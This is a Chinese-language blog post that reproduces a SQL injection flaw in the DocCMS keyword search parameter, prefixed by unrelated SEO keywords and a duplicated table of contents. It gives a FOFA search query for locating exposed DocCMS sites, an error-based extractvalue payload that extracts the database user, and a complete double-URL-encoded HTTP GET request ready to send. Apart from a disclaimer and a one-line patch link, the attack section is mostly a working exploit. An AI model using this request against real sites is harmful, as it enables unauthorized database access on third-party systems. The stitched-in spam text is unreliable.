做食品网站,代码生成器属于什么工具,百度搜索排名优化,池州最好的网站建设文章目录 DocCMS keyword SQL注入漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 DocCMS keyword SQL注入漏洞复现 [附POC]
0x01 前言
免责声明#xff1a;请勿利用文章内的相关技术从事非法测… 文章目录 DocCMS keyword SQL注入漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现 0x06 修复建议 DocCMS keyword SQL注入漏洞复现 [附POC]
0x01 前言
免责声明请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用
0x02 漏洞描述
DocCMS是一个开源的内容管理系统(CMS)。DocCMS是一个功能完善、易于扩展和使用的开源CMS系统。特别适用于需要动态内容管理和多用户协作的中小型网站和应用。
0x03 影响版本
DocCMS0x04 漏洞环境
FOFA语法app“Doccms”
0x05 漏洞复现
1.访问漏洞环境
2.构造POC
payload and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#POC GET
GET /search/index.php?keyword1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0PSPOC中的SQL语句需对payload二次URL编码
3.复现
首先对对payload二次URL编码
发送数据包出现数据库报错执行成功
0x06 修复建议
官方修复缓解措施
补丁链接https://gitee.com/husky/DocCMS